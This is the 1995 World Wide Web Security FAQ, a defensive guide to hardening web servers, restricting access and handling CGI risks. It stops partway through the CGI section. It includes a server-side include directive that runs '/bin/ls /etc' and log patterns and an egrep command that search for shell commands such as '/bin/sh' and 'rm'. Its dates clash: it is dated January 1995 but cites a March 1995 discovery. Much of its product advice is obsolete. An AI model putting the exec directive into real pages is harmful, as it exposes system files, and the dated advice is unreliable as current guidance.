The World Wide Web Security FAQ

Lincoln D. Stein <lstein@genome.wi.mit.edu>
Version 1.1.5, January 2, 1995

CONTENTS

  1. Introduction
  2. What's New?
  3. General Questions
  4. Running a Secure Server
  5. Protecting Confidential Documents at Your Site
  6. CGI Scripts
  7. Safe Scripting in Perl
  8. Server Logs and Privacy
  9. Client Side Security
  10. Bibliography

1. Introduction

This is the World Wide Web Security Frequently Asked Question list (FAQ). It attempts to answer some of the most frequently asked questions relating to the security implications of running a Web server. There is also a short section on Web security from the browser's perspective.

Copies of this document can be obtained at:

The author of this FAQ has very limited experience with the Macintosh and Windows servers. Web servers for these operating systems are pretty new, and there hasn't been much time for collective wisdom on the security issues for these platforms to form. I apologize for the pronounced Unix (and Linux) bias in this document. Help in fleshing out these topics is welcomed!

Much of this document is abstracted from the author's book "How to Set Up and Maintain a World Wide Web Site", published by Addison-Wesley.

This document is © copyright 1995, Lincoln D. Stein. However it may be freely reprinted and redistributed.

Many thanks to the following people for their helpful comments and contributions to this document:


2. What's New?

  1. Version 1.1.5
  2. Version 1.1.4
  3. Version 1.1.3
  4. Version 1.1.2
  5. Version 1.1.1
  6. Version 1.1

3. General Questions

Q1: What's to worry about?

Unfortunately, there's a lot to worry about. The moment you install a Web server at your site, you've opened a window into your local network that the entire Internet can peer through. Most visitors are content to window shop, but a few will try to peek at things you don't intend for public consumption. Others, not content with looking without touching, will attempt to force the window open and crawl in.

It's a maxim in system security circles that buggy software opens up security holes. It's a maxim in software development circles that large, complex programs contain bugs. Unfortunately, Web servers are large, complex programs that can (and in some cases have been proven to) contain security holes.

Furthermore, the open architecture of Web servers allows arbitrary CGI scripts to be executed on the server's side of the connection in response to remote requests. Any CGI script installed at your site may contain bugs, and every such bug is a potential security hole.


Q2: Exactly what security risks are we talking about?

There are basically four overlapping types of risk:
  1. Private or confidential documents stored in the Web site's document tree falling into the hands of unauthorized individuals.
  2. Private or confidential information sent by the remote user to the server (such as credit card information) being intercepted.
  3. Information about the Web server's host machine leaking through, giving outsiders access to data that can potentially allow them to break into the host.
  4. Bugs that allow outsiders to execute commands on the server's host machine, allowing them to modify and/or damage the system. This includes "denial of service" attacks, in which the attackers pummel the machine with so many requests that it is rendered effectively useless.


Q3: Are some operating systems more secure to use as platforms for Web servers than others?

The answer is yes, although the Unix community may not like to hear it. In general, the more powerful and flexible the operating system, the more open it is for attack through its Web (and other) servers.

Unix systems, with their large number of built-in servers, services, scripting languages, and interpreters, are particularly vulnerable to attack because there are simply so many portals of entry for hackers to exploit. Less capable systems, such as Macintoshes and MS-Windows machines, are harder to exploit. Then again, it's harder to accomplish really cool stuff on these machines, so you have a tradeoff between convenience and security.

Of course, you always have to factor in the experience of the people running the server host and software. A Unix system administered by a seasoned Unix administrator will probably be more secure than an MS-Windows system set up by a novice.


Q4: Are some Web server software programs more secure than others?

Again, the answer is yes, although it would be foolhardy to give specific recommendations on this point. As a rule of thumb, the more features a server offers, the more likely it is to contain security holes. Simple servers that do little more than make static files available for requests are probably safer than complex servers that offer such features as on-the-fly directory listings, CGI script execution, server-side include processing, and scripted error handling.

Version 1.3 of NCSA's Unix server contains a serious known security hole. Discovered in March of 1995, this hole allows outsiders to execute arbitrary commands on the server host. If you have a version 1.3 httpd binary whose creation date is earlier than March 1995 don't use it! Replace it with the patched 1.3 server (available at http://hoohoo.ncsa.uiuc.edu/) or with version 1.4 or higher (available at the same site). The Apache plug-in replacement for NCSA ( http://www.hyperreal.com/apache/info.html) is also free of this bug.

Servers also vary in their ability to restrict browser access to individual documents or portions of the document tree. Some servers provide no restriction at all, while others allow you to restrict access to directories based on the IP address of the browser or to users who can provide the correct password. A few servers, primarily commercial ones (e.g. Netsite Commerce Server, Open Market), provide data encryption as well.

The WN server, by John Franks, deserves special mention in this regard because its design is distinctively different from other Web servers. While most servers take a permissive attitude to file distribution, allowing any document in the document root to be transferred unless it is specifically forbidden, WN takes a restrictive stance. The server will not transfer a file unless it has been explicitly placed on a list of allowed documents. On-the-fly directory listings and other "promiscuous" features are also disallowed. Information on WN's security features can be found in its online documentation at:

http://hopf.math.nwu.edu/docs/security.html

A table comparing the features of a large number of commercial, freeware and public domain servers has been put together by Paul Hoffman and is also available online:

http://www.proper.com/www/servers-chart.html


Q5: Are CGI scripts insecure?

CGI scripts are a major source of security holes. Although the CGI (Common Gateway Interface) protocol is not inherently insecure, CGI scripts must be written with just as much care as the server itself. Unfortunately, some scripts fall short of this standard, and trusting Web administrators install them at their sites without realizing the problems.

Q6: Are server-side includes insecure?

Server-side includes, snippets of server directives embedded in HTML documents, are another potential hole. A subset of the directives available in server-side includes instructs the server to execute arbitrary system commands and CGI scripts. Unless the author is aware of the potential problems, it's easy to introduce unintentional side effects. Unfortunately, HTML files containing dangerous server-side includes are seductively easy to write.
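
For example, in NCSA-style servers a single embedded directive of the following form will cause the server to run an arbitrary system command (the command shown is only an illustration):

   <!--#exec cmd="/bin/ls /etc" -->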


Q7: What general security precautions should I take?

For Web servers running on Unix systems, here are some general security precautions to take:
  1. Limit the number of login accounts available on the machine. Delete inactive users.
  2. Make sure that people with login privileges choose good passwords. The Crack program will help you detect poorly-chosen passwords:

ftp://ftp.cert.org/pub/tools/crack/

  3. Turn off unused services. For example, if you don't need to run FTP on the Web server host, physically remove the ftp daemon. Likewise for tftp, sendmail, gopher, NIS (network information services) clients, NFS (networked file system), finger, systat, and anything else that might be hanging around. Check the file /etc/inetd.conf for a list of daemons that may be lurking, and comment out the ones you don't use, as sketched below.
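
Here is a sketch of what commented-out entries in /etc/inetd.conf might look like (the exact fields vary from system to system); after editing the file, send inetd a HUP signal so the change takes effect:

   #ftp    stream  tcp  nowait  root    /usr/sbin/ftpd    ftpd
   #finger stream  tcp  nowait  nobody  /usr/sbin/fingerd fingerd

   kill -HUP `cat /var/run/inetd.pid`   # or find inetd's PID with ps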

  4. Remove shells and interpreters that you don't absolutely need. For example, if you don't run any Perl-based CGI scripts, remove the Perl interpreter.

  5. Check both the system and Web logs regularly for suspicious activity. The program Tripwire is helpful here, as it detects break-in attempts by watching sensitive system files and programs for modification:

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/

More on scanning Web logs for suspicious activity below.

  6. Make sure that permissions are set correctly on system files, to discourage tampering. The program COPS is useful for this:

ftp://ftp.cert.org/pub/tools/cops/

Be alert to the possibility that a _local_ user can accidentally make a change to the Web server configuration file or the document tree that opens up a security hole. You should set file permissions in the document and server root directories such that only trusted local users can make changes. Many sites create a "www" group to which trusted Web authors are added; the document root is made writable only by members of this group. To increase security further, the server root, where vital configuration files are kept, is made writable only by the official Web administrator. Many sites create a "www" user for this purpose.
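
For example, here is a sketch of commands that implement such a policy (the paths are illustrative; substitute your own document and server roots):

   chgrp -R www /usr/local/etc/httpd/htdocs
   chmod -R g+w,o-w /usr/local/etc/httpd/htdocs   # the www group may write
   chown -R www /usr/local/etc/httpd/conf
   chmod -R go-w /usr/local/etc/httpd/conf        # only the www user may write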


Q8: Where can I learn more about general network security measures?

Good books to get include:

A source of timely information, including announcements of newly discovered security holes, is the set of CERT Coordination Center advisories, posted to the newsgroup comp.security.announce and archived at:

ftp://ftp.cert.org/pub/cert_advisories/

A mailing list devoted specifically to issues of WWW security is maintained by the IETF Web Transaction Security Working Group. To subscribe, send e-mail to www-security-request@nsmx.rutgers.edu. In the body text of the message write:

SUBSCRIBE www-security your_email_address

A series of security FAQs is maintained by Internet Security Systems, Inc. The FAQs can be found at:

http://www.iss.net/iss/faq.html

The main WWW FAQ also contains questions and answers relevant to Web security, such as log file management and sources of server software. The most recent version of this FAQ can be found at:

http://sunsite.unc.edu/boutell/faq/www_faq.html


4. Running a Secure Server

Q9: How do I set the file permissions of my server and document roots?

To maximize security, you should adopt a strict "need to know" policy for both the document root (where HTML documents are stored) and the server root (where log and configuration files are kept). It's most important to get permissions right in the server root because it is here that CGI scripts and the sensitive contents of the log and configuration files are kept.

You need to protect the server from the prying eyes of both local and remote users. The simplest strategy is to create a "www" user for the Web administrator (webmaster) and a "www" group for all the users on your system who need to author HTML documents. On Unix systems, edit the /etc/passwd file to make the server root the home directory for the www user. Edit /etc/group to add all authors to the www group.

The server root should be set up so that only the www user can write to the configuration and log directories and to their contents. It's up to you whether you want these directories to also be readable by the www group. They should _not_ be world readable. The cgi-bin directory and its contents should be world executable and readable, but not writable (if you trust them, you could give local Web authors write permission for this directory). Following are the permissions for a sample server root:

drwxr-xr-x   5 www      www          1024 Aug  8 00:01 cgi-bin/
drwxr-x---   2 www      www          1024 Jun 11 17:21 conf/
-rwx------   1 www      www        109674 May  8 23:58 httpd
drwxrwxr-x   2 www      www          1024 Aug  8 00:01 htdocs/
drwxrwxr-x   2 www      www          1024 Jun  3 21:15 icons/
drwxr-x---   2 www      www          1024 May  4 22:23 logs/

The Netsite Commerce Server appears to contain a bug that prevents you from setting up the server root with correct permissions. In order to start up, this server requires that the logs directory either be writable by the "nobody" user, or that a log file writable by the "nobody" user already exist in that directory. In either case this represents a security hole, because it means that a remote user who has infiltrated the system by subverting a CGI script or the server itself can cover his tracks by modifying or deleting the access log file. It is not known if this bug affects the Netsite (non-Commerce) Server. (Thanks to Laura Pearlman for this information.)

The document root has different requirements. All files that you want to serve on the Internet must be readable by the server while it is running under the permissions of user "nobody". You'll also usually want local Web authors to be able to add files to the document root freely. Therefore you should make the document root directory and its subdirectories owned by user and group "www", world readable, and group writable:

drwxrwxr-x   3 www      www          1024 Jul  1 03:54 contents
drwxrwxr-x  10 www      www          1024 Aug 23 19:32 examples
-rw-rw-r--   1 www      www          1488 Jun 13 23:30 index.html
-rw-rw-r--   1 lstein   www         39294 Jun 11 23:00 resource_guide.html

Many servers allow you to restrict access to parts of the document tree to Internet browsers with certain IP addresses or to remote users who can provide a correct password (see below). However, some Web administrators may be worried about unauthorized _local_ users gaining access to restricted documents present in the document root. This is a problem when the document root is world readable.

One solution to this problem is to run the server as something other than "nobody", for example as another unprivileged user ID that belongs to the "www" group. You can then make the restricted documents group- but not world-readable (don't make them group-writable unless you want the server to be able to overwrite its documents!). The documents are now protected from prying eyes both locally and globally. Remember to set the read and execute permissions for any restricted server scripts as well.

The CERN server generalizes this solution by allowing the server to execute under different user and group privileges for each part of a restricted document tree. See the CERN documentation for details on how to set this up.


Q10: I'm running a server that provides a whole bunch of optional features. Are any of them security risks?

Yes. Many features that increase the convenience of using and running the server also increase the chances of a security breach. Here is a list of potentially dangerous features; if you don't absolutely need them, turn them off.
Automatic directory listings
Knowledge is power, and the more a remote hacker can figure out about your system, the more chances he has to find loopholes. The automatic directory listings that the CERN, NCSA, Netscape, Apache, and other servers offer are convenient, but they have the potential to give the hacker access to sensitive information. This information can include: Emacs backup files containing the source code to CGI scripts, source-code control logs, symbolic links that you once created for your convenience and forgot to remove, directories containing temporary files, etc.

Of course, turning off automatic directory listings doesn't prevent people from fetching files whose names they guess at. It also doesn't avoid the pitfall of an automatic text keyword search program that inadvertently adds the "hidden" file to its index. To be safe, you should remove unwanted files from your document root entirely.

Symbolic link following
Some servers allow you to extend the document tree with symbolic links. This is convenient, but can lead to security breaches when someone accidentally creates a link to a sensitive area of the system, for example /etc. A safer way to extend the directory tree is to include an explicit entry in the server's configuration file (this involves a PathAlias directive in NCSA-style servers, and a Pass rule in the CERN server).

The NCSA and Apache servers allow you to turn symbolic link following off completely. Another option allows symbolic link following only if the owner of the link matches the owner of the link's target (i.e. you can compromise the security of a part of the document tree that you own, but not someone else's part).

Server side includes
The "exec" form of server side includes are a major security hole. Their use should be restricted to trusted users or turned off completely. In NCSA httpd and Apache, you can turn off the exec form of includes in a directory by placing this statement in the appropriate directory control section of access.conf:
      Options IncludesNoExec
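
For example, a directory control section along these lines (the path is illustrative) permits server-side includes while disabling the "exec" form:

   <Directory /usr/local/etc/httpd/htdocs>
   Options IncludesNoExec
   </Directory>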
User-maintained directories
Allowing any user on the host system to add documents to your Web site is a wonderfully democratic system. However, you do have to trust your users not to open up security holes. This includes publishing files that contain sensitive system information, as well as creating CGI scripts, server-side includes, or symbolic links that open up security holes. Unless you really need this feature, it's best to turn it off. When a user needs to create a home page, it's probably best to give him his own piece of the document root to work in, and to make sure that he understands what he's doing. Whether home pages are located in users' home directories or in a piece of the document root, it's best to disallow server-side includes and CGI scripts in this area.

Q11: I hear that running the server as "root" is a bad idea. Is this true?

This has been the source of some misunderstanding and disagreement on the Net. Most servers are launched as root so that they can open up the low numbered port 80 (the standard HTTP port) and write to the log files. They then wait for an incoming connection on port 80. As soon as they receive this connection, they fork a child process to handle the request and go back to listening. The child process, meanwhile, changes its effective user ID to the user "nobody" and then proceeds to process the remote request. All actions taken in response to the request, such as executing CGI scripts or parsing server-side includes, are done as the unprivileged "nobody" user.

This is not the scenario that people warn about when they talk about "running the server as root". The warning is about servers that have been configured to run their _child processes_ as root (e.g., by specifying "User root" in the server configuration file). This is a whopping security hole, because every CGI script that gets launched with root permissions will have access to every nook and cranny in your system.

Some people will say that it's better not to start the server as root at all, warning that we don't know what bugs may lurk in the portion of the server code that controls its behavior between the time it starts up and the time it forks a child. This is quite true, although the source code to all the public domain servers is freely available and there don't _seem_ to be any bugs in these portions of the code. Running the server as an ordinary unprivileged user may be safer. Many sites launch the server as user "nobody", "daemon" or "www". However you should be aware of two potential problems with this approach:

  1. You won't be able to open port 80 (at least not on Unix systems). You'll have to tell the server to listen on another port, such as 8000 or 8080 (see the configuration sketch after this list).
  2. You'll have to make the configuration files readable by the same user ID you run the server under. This opens up the possibility of an errant CGI script reading the server configuration files. Similarly, you'll have to make the log files both readable and writable by this user ID, making it possible for a subverted server or CGI script to alter the log. See the discussion of file permissions above.
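
In NCSA-style servers, for example, the listening port is set with the Port directive in httpd.conf; a sketch for an unprivileged server:

   Port 8080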

Q12: I want to share the same document tree between my ftp and Web servers. Is there any problem with this idea?

Many sites like to share directories between the FTP daemon and the Web daemon. This is OK so long as there's no way that a remote user can upload files that can later be read or executed by the Web daemon.

Consider this scenario: the WWW server has been configured to execute any file ending in the extension ".cgi". Using your ftp daemon, a remote hacker uploads a Perl script to your ftp site and gives it the .cgi extension. He then uses his browser to request the newly uploaded file from your Web server. Bingo! He's fooled your system into executing the commands of his choice.

You can overlap the ftp and Web server hierarchies, but be sure to limit ftp uploads to an "incoming" directory that can't be read by the "nobody" user.
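
A common arrangement is to make the incoming directory world writable and searchable, but not readable, so that the "nobody" user cannot retrieve what others have uploaded. A sketch (the path is illustrative):

   mkdir /home/ftp/incoming
   chown root /home/ftp/incoming
   chmod 733 /home/ftp/incoming   # writable and searchable, but not readable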


Q13: Can I make my site completely safe by running the server in a "chroot" environment?

You can't make your server completely safe, but you can increase its security significantly in a Unix environment by running it in a chroot environment. The chroot system command places the server in a "silver bubble" in such a way that it can't see any part of the file system beyond a directory tree that you have set aside for it. The directory you designate becomes the server's new root "/" directory. Anything above this directory is inaccessible.

In order to run a server in a chroot environment, you have to create a whole miniature root file system that contains everything the server needs access to. This includes special device files and shared libraries. You also need to adjust all the path names in the server's configuration files so that they are relative to the new root directory. To start the server in this environment, place a shell script around it that invokes the chroot command in this way:

   chroot /path/to/new/root /server_root/httpd

Setting up the new root directory can be tricky and is beyond the scope of this document. See the author's book (above), for details. You should be aware that a chroot environment is most effective when the new root directory is as barren as possible. There shouldn't be any interpreters, shells, or configuration files (including /etc/passwd!) in the new root directory. Unfortunately this means that CGI scripts that rely on Perl or shells won't run in the chroot environment. You can add these interpreters back in, but you lose some of the benefits of chroot.

Also be aware that chroot only protects files; it's not a panacea. It doesn't prevent hackers from breaking into your system in other ways, such as grabbing system maps from the NIS network information service, or playing games with NFS.


Q14: My local network runs behind a firewall. Can I use it to increase my Web site's security?

You can use a firewall to enhance your site's security in a number of ways. The most straightforward use of a firewall is to create an "internal site", one that is accessible only to computers within your own local area network. If this is what you want to do, then all you need to do is place the server INSIDE the firewall:
          other hosts
                     \
       server <-----> FIREWALL <------> OUTSIDE
                     /
          other hosts

However, if you want to make the server available to the rest of the world, you'll need to place it somewhere outside the firewall. From the standpoint of security of your organization as a whole, the safest place to put it is completely outside the local area network:

          other hosts
                     \
   other hosts <----> FIREWALL <---> server <----> OUTSIDE
                     /
          other hosts

This is called a "sacrificial lamb" configuration. The server is at risk of being broken into, but at least when it's broken into it doesn't breach the security of the inner network.

It's _not_ a good idea to run the WWW server on the firewall machine itself: any bug in the server would then compromise the security of the entire organization.

There are a number of variations on this basic setup, including architectures that use paired "inner" and "outer" servers to give the world access to public information while giving the internal network access to private documents. See the author's book for the gory details.


Q15: My local network runs behind a firewall. Can I break through the firewall to give the rest of the world access to the Web server?

You can, but if you do this you are opening up a security hole in the firewall. It's far better to make the server a "sacrificial lamb" as described above. Some firewall architectures, however, don't give you the option of placing the host outside the firewall. In this case, you have no choice but to open up a hole in the firewall. There are two options:
  1. If you are using a "screened host" type of firewall, you can selectively allow the firewall to pass requests for port 80 that are bound to or returning from the WWW server machine. This has the effect of poking a small hole in the dike through which the rest of the world can send and receive requests to the WWW server machine.
  2. If you are using a "dual homed gateway" type of firewall, you'll need to install a proxy on the firewall machine. A proxy is a small program that can see both sides of the firewall. Requests for information from the Web server are intercepted by the proxy, forwarded to the server machine, and the response forwarded back to the requester. A small and reliable HTTP proxy is available from TIS systems at:

ftp://ftp.tis.com/pub/firewalls/toolkit/

The CERN server can also be configured to act as a proxy. I feel much less comfortable recommending it, however, because it is a large and complex piece of software that may contain unknown security holes.

More information about firewalls is available in the books Firewalls and Internet Security by William Cheswick and Steven Bellovin, and Building Internet Firewalls by D. Brent Chapman and Elizabeth D. Zwicky.


Q16: How can I detect if my site's been broken into?

For Unix systems, the Tripwire program periodically scans your system and detects whether any system files or programs have been modified. It is available at:

ftp://coast.cs.purdue.edu/pub/COAST/Tripwire/

You should also check your access and error log files periodically for suspicious activity. Look for accesses involving system commands such as "rm", "login", "/bin/sh" and "perl", or extremely long lines in URL requests (the former indicate an attempt to trick a CGI script into invoking a system command; the latter an attempt to overrun a program's input buffer). Also look for repeated unsuccessful attempts to access a password protected document. These could be symptomatic of someone trying to guess a password.
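
A quick way to sweep the access log for these patterns is with standard Unix tools; a sketch (the log path is illustrative):

   egrep 'rm |login|/bin/sh|perl' /usr/local/etc/httpd/logs/access_log
   awk 'length($0) > 300' /usr/local/etc/httpd/logs/access_log   # very long requests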



5. Protecting Confidential Documents at Your Site

Q17: What types of access restrictions are available?

There are three types of access restriction available:
  1. Restriction by IP address, subnet, or domain

    Individual documents or whole directories are protected in such a way that only browsers connecting from certain IP (Internet) addresses, IP subnets, or domains can access them.

  2. Restriction by user name and password

    Documents or directories are protected so that the remote user has to provide a name and password in order to get access.

  3. Encryption using public key cryptography

    Both the request for the document and the document itself are encrypted in such a way that the text cannot be read by anyone but the intended recipient. Public key cryptography can also be used for reliable user verification. See below.


Q18: How safe is restriction by IP address or domain name?

Restriction by IP address is secure against casual nosiness but not against a determined hacker. There are several ways around IP address restrictions. With the proper equipment and software, a hacker can "spoof" his IP address, making it seem as if he's connecting from a location different from his real one. Nor is there any guarantee that the person contacting your server from an authorized host is in fact the person you think he is. The remote host may have been broken into and is being used as a front. To be safe, IP address restriction must be combined with something that checks the identity of the user, such as a check for user name and password.

IP address restriction can be made much safer by running your server behind a firewall machine that is capable of detecting and rejecting attempts at spoofing IP addresses. Such detection works best for intercepting packets from the outside world that claim to be from trusted machines on your internal network.

One thing to be aware of is that if a browser is set to use a proxy server to fetch documents, then your server will only know about the IP address of the proxy, not the real user's. This means that if the proxy is in a trusted domain, anyone can use that proxy to access your site. Unless you know that you can trust a particular proxy to do its own restriction, don't add the IP address of a proxy (or a domain containing a proxy server) to the list of authorized addresses.

Restriction by host or domain name has the same risks as restriction by IP address, but also suffers from the risk of "DNS spoofing", an attack in which your server is temporarily fooled into thinking that a trusted host name belongs to an alien IP address. To lessen that risk, some servers can be configured to do an extra DNS lookup for each client. After translating the IP address of the incoming request to a host name, the server uses the DNS to translate from the host name back to the IP address. If the two addresses don't match, the access is forbidden. See below for instructions on enabling this feature in NCSA's httpd.


Q19: How safe is restriction by user name and password?

Restriction by user name and password also has its problems. A password is only good if it's chosen carefully. Too often users choose obvious passwords like middle names, their birthday, their office phone number, or the name of a favorite pet goldfish. These passwords can be guessed at, and WWW servers, unlike Unix login programs, don't complain after repeated unsuccessful guesses. A determined hacker can employ a password guessing program to break in by brute force. You also should be alert to the possibility of remote users sharing their user names and passwords. It is more secure to use a combination of IP address restriction and password than to use either of them alone.

Another problem is that the password is vulnerable to interception as it is transmitted from browser to server. It is not encrypted in any meaningful way, so a hacker with the right hardware and software can pull it off the Internet as it passes through. Furthermore, unlike a login session, in which the password is passed over the Internet just once, a browser sends the password each and every time it fetches a protected document. This makes it easier for a hacker to intercept the transmitted data as it flows across the Internet. To avoid this, you have to encrypt the data. See below.

If you need to protect documents against _local_ users on the server's host system, you'll need to run the server as something other than "nobody" and to set the permissions of both the restricted documents and server scripts so that they're not world readable. See Q9.


Q20: What is user authentication?

User authentication is any system for determining and verifying the identity of a remote user. A user name and password is a simple form of user authentication. Public key cryptographic systems, described below, provide a more sophisticated form of authentication that uses an unforgeable electronic signature.

Q21: How do I restrict access to documents by the IP address or domain name of the remote browser?

The details are different for each server. See your server's documentation for details. For servers based on NCSA httpd, you'll need to add a directory control section to access.conf that looks something like this:
   <Directory /full/path/to/directory>
     <Limit GET POST>
       order mutual-failure
       deny from all
       allow from 192.198.2 .zoo.org
       allow from 18.157.0.5 stoat.outback.au
     </Limit>
   </Directory>

This will deny access to everybody but the indicated hosts (18.157.0.5 and stoat.outback.au), subnets (192.198.2) and domains (.zoo.org). Although you can use either numeric IP addresses or host names, it's safer to use the numeric form because this form of identification is less easily subverted (Q18).

One way to increase the security of restriction by domain name is to make sure that your server double-checks the results of its DNS lookups. You can enable this feature in NCSA's httpd (and the related Apache server) by making sure that the -DMAXIMUM_DNS flag is set in the Makefile.
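
The relevant line of the Makefile might look something like this sketch (your other compiler flags will differ):

   CFLAGS= -O2 -DMAXIMUM_DNS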

For the CERN server, you'll need to declare a protection scheme with the Protection directive, and associate it with a local URL using the Protect directive. An entry in httpd.conf that limits access to certain domains might look like this:

   Protection LOCAL-USERS {
     GetMask @(*.capricorn.com, *.zoo.org, 18.157.0.5)
   }

   Protect /relative/path/to/directory/* LOCAL-USERS

Q22: How do I add new users and passwords?

Unix-based servers use password and group files similar to the like-named Unix files. Although the formats are similar enough to allow you to use the Unix versions for the Web server, this isn't a good idea. You don't want to give a hacker who's guessed a Web password carte blanche to log into the Unix host.

Check your server documentation for the precise details of how to add new users. For NCSA httpd, you can add a new user to the password file using the htpasswd program that comes with the server software:

   htpasswd /path/to/password/file username

htpasswd will then prompt you for the password to use. The first time you invoke htpasswd you must provide a -c flag to create the password file from scratch.
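
For example, to create the password file and add the first user (the path and user name are illustrative):

   htpasswd -c /usr/local/etc/httpd/conf/passwd fred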

The CERN server comes with a slightly different program called htadm:

   htadm -adduser /path/to/password/file username

htadm will then prompt you for the new password.

After you add all the authorized users, you can attach password protection to the directories of your choice. In NCSA httpd and its derivatives, add something like this to access.conf:

   <Directory /full/path/to/protected/directory>

     AuthName          name.of.your.server
     AuthType          Basic
     AuthUserFile      /usr/local/etc/httpd/conf/passwd
     <Limit GET POST>
       require valid-user
     </Limit>

   </Directory>

You'll need to change AuthUserFile to point to the full path of your own password file. This type of protection can be combined with IP address restriction as described in the previous section. See NCSA's online documentation (http://hoohoo.ncsa.uiuc.edu/) or the author's book for more details.

For the CERN server, the corresponding entry in httpd.conf looks like this:

   Protection AUTHORIZED-USERS {
     AuthType     Basic
     ServerID     name.of.your.server
     PasswordFile /usr/local/etc/httpd/conf/passwd
     GetMask      All
   }

   Protect /relative/path/to/directory/* AUTHORIZED-USERS

Again, see the documentation or the author's book for details.

Q23: Isn't there a CGI script to allow users to change their passwords online?

There are several, but the author doesn't know of any that have been sufficiently well tested to recommend. This is a tricky thing to set up, and a good general script has not yet been made publicly available. Some sites have solved this problem by setting up a second HTTP server for the sole purpose of changing the password file. This server listens on a different port from the primary server, and runs with sufficient permissions so that it can write to the password file (e.g., it runs as user "www").

Q24: Using per-directory access control files to control access to directories is so convenient, why should I use access.conf?

Instead of placing directory access restriction directives in centralized configuration files, most servers give you the ability to control access by putting a "hidden" file in the directory you want to restrict access to (this file is called ".htaccess" in NCSA-derived servers and ".www_acl" in the CERN server). It is very convenient to use these files, since you can adjust the restrictions on a directory without having to edit the central access control file. However, there are several problems with relying on them too heavily. One is that with access control files scattered all over the document hierarchy, there is no central place where the access policy for the site is clearly set out. Another is that it is easy for these files to be modified or overwritten inadvertently, opening up a section of the document tree to the public. Finally, there is a bug in many servers (including the NCSA server) that allows the access control files to be fetched just like any other file, using a URL such as:
   http://your.site.com/protected/directory/.htaccess
This is clearly an undesirable feature since it gives out important information about your system, including the location of the server password file.

Another problem with per-directory access files is that if you ever need to change the server software, it's a lot easier to update a single central access control file than to search out and fix a hundred small files.


Q25: How does encryption work?

Encryption works by encoding the text of a message with a key. In traditional encryption systems, the same key was used for both encoding and decoding. In the new public key or asymmetric encryption systems, keys come in pairs: one key is used for encoding and another for decoding. In this system, everyone owns a unique pair of keys. One of the keys, called the public key, is widely distributed and used for encoding messages. The other key, called the private key, is a closely held secret used to decrypt incoming messages. Under this system, a person who needs to send a message to a second person can encrypt the message with that person's public key. The message can only be decrypted by the owner of the secret private key, making it safe from interception. This system can also be used to create unforgeable digital signatures.

Most practical implementations of secure Internet encryption actually combine the traditional symmetric and the new asymmetric schemes. Public key encryption is used to negotiate a secret symmetric key that is then used to encrypt the actual data.

Since commercial ventures have a critical need for secure transmission on the Web, there is very active interest in developing schemes for encrypting the data that passes between browser and server.

More information on public key cryptography can be found in the book "Applied Cryptography", by Bruce Schneier.


Q26: What are: SSL, SHTTP, Shen?

These are all proposed encryption and user authentication standards for the Web. Each requires the right combination of compatible browser and server to operate, so none is yet the universal solution to the secure data transmission problem.

SSL (Secure Socket Layer) is the scheme proposed by Netscape Communications Corporation. It is a low level encryption scheme used to encrypt transactions in higher-level protocols such as HTTP, NNTP and FTP. The SSL protocol includes provisions for server authentication (verifying the server's identity to the client), encryption of data in transit, and optional client authentication (verifying the client's identity to the server). SSL is currently implemented commercially only for Netscape browsers and some Netscape servers. (While both the data encryption and server authentication parts of the SSL protocol are implemented, client authentication is not yet available.) Open Market, Inc. has also announced plans to support SSL in a forthcoming version of their HTTP server. Details on SSL can be found at:

http://home.netscape.com/info/SSL.html

SHTTP (Secure HTTP) is the scheme proposed by CommerceNet, a coalition of businesses interested in developing the Internet for commercial uses. It is a higher level protocol that only works with the HTTP protocol, but is potentially more extensible than SSL. Currently SHTTP is implemented for the Open Marketplace Server marketed by Open Market, Inc on the server side, and Secure HTTP Mosaic by Enterprise Integration Technologies on the client side. See here for details:

http://www.commerce.net/information/standards/drafts/shttp.txt

Shen is a scheme proposed by Phillip Hallam-Baker of CERN. Like SHTTP, it is a high-level replacement for the existing HTTP protocol. It has not yet been implemented in production-quality software. You can read about it at:

http://www.w3.org/hypertext/WWW/Shen/ref/security_spec.html


Q27: How do I accept credit card orders over the Web?

You can always instruct users to call your 800 number :-). Seriously, though, you _shouldn't_ ask remote users to submit their credit card number in a fill-out form field unless you are using an encrypting server/browser combination. Your alternative is to use one of the credit card proxy systems described in the next section.

Even with an encrypting server, you should be careful about what happens to the credit card number after it's received by the server. For example, if the number is received by a server script, make sure not to write it out to a world-readable log file or send it via e-mail to a remote site.


Q28: What are: First Virtual Accounts, DigiCash, Cybercash?

These are all schemes that have been developed to process commercial transactions over the Web without transmitting credit card numbers.

In the First Virtual scheme, designed for low- to medium-priced software sales and fee-for-service information purchases, the user signs up for a First Virtual account by telephone. During the sign-up procedure he provides his credit card number and contact information, and receives a First Virtual account number in return. Thereafter, to make purchases at participating online vendors, the user provides his First Virtual account number in lieu of his credit card information. First Virtual later contacts him by e-mail, and he has the chance to approve or disapprove the purchase before his credit card is billed. First Virtual is in operation now and requires no special software or hardware on the user's or merchant's side of the connection. More information can be obtained at:

http://www.fv.com/

Digicash, a product of the Netherlands-based DigiCash company, is a debit system something like an electronic checking account. In this system, users make an advance lump-sum payment to a bank that supports the DigiCash system and receive "E-cash" in return. Users then make purchases electronically, and the E-cash is debited from their accounts. This system is currently in development and has not been released for public use. It also appears to require special client software to be installed on both the user's and the merchant's computers. For more information:

http://www.digicash.nl/

Cybercash, invented by the Cybercash Corporation, is both a debit and a credit card system. In credit card mode, the user installs specialized software on his computer. When the WWW browser needs to obtain a credit card number, it invokes the Cybercash software which pops up a window that requests the number. The number is then encrypted and transmitted to corresponding software installed on the merchant's machine. In debit mode, a connection is established to a participating bank. Cybercash is in the pilot phase, and more information can be obtained at:

http://www.cybercash.com

In addition to these forms of credit card payment, the Netscape Communications Corporation has made deals with both First Data, a large credit card processor, and MasterCard to incorporate credit card processing into the Netscape/Netsite combination. These arrangements, when implemented, will use Netscape's built-in encryption to encode and approve credit card purchases without additional software. For more information, check the literature at:

http://www.mcom.com/

Open Market, Inc., is also offering credit card purchases. In this scheme, Open Market acts as the credit card company itself, handling subscriptions, billing and accounting. The scheme is integrated into its Open Marketplace Server, and requires a browser that supports the SHTTP protocol (only Secure Mosaic, at the moment). This service too is in the pilot stage. More information is available from Open Market at:

http://www.openmarket.com



6. CGI (Server) Scripts

Q29: What's the problem with CGI scripts?

The problem with CGI scripts is that each one presents yet another opportunity for exploitable bugs. CGI scripts should be written with the same care and attention given to Internet servers themselves, because, in fact, they are miniature servers. Unfortunately, for many Web authors, CGI scripts are their first encounter with network programming.

CGI scripts can present security holes in two ways:

  1. They may intentionally or unintentionally leak information about the host system that will help hackers break in.
  2. Scripts that process remote user input, such as the contents of a form or a "searchable index" command, may be vulnerable to attacks in which the remote user tricks them into executing commands.

